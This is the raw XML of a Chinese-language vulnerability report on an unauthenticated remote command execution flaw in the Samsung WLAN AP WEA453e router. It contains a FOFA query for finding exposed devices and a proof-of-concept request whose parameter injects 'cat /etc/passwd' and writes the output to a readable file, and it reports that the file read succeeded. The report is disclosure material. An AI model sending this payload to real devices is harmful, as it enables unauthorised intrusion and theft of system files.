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jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>三星 WLAN AP WEA453e路由器 远程命令执行漏洞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漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三星 WLAN AP WEA453e路由器  存在远程命令执行漏洞，可在未授权的情况下执行任意命令获取服务器权限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漏洞影响</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三星 WLAN AP WEA453e路由器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漏洞复现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 xml:space="preserve">FOFA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title=="Samsung WLAN AP"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2）登录界面如下</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="221742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请求包如下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/(download)/tmp/a.txt HTTP/1.1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xxx.xxx.xxx.xxx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48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command1=shell:cat /etc/passwd| dd of=/tmp/a.txt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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件读取成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="261302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908C7C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="EE908C7C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31F45382"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="31F4538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72F"/>
    <w:rsid w:val="062438F8"/>
    <w:rsid w:val="348C7B5B"/>
    <w:rsid w:val="4E360DCD"/>
    <w:rsid w:val="53B21F71"/>
    <w:rsid w:val="64B02AC9"/>
    <w:rsid w:val="69F06398"/>
    <w:rsid w:val="6B2000BF"/>
    <w:rsid w:val="6BFD6BE6"/>
    <w:rsid w:val="763C0AC9"/>
    <w:rsid w:val="79F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2021-04-06T07:58:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>wll</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-06T09:31:38Z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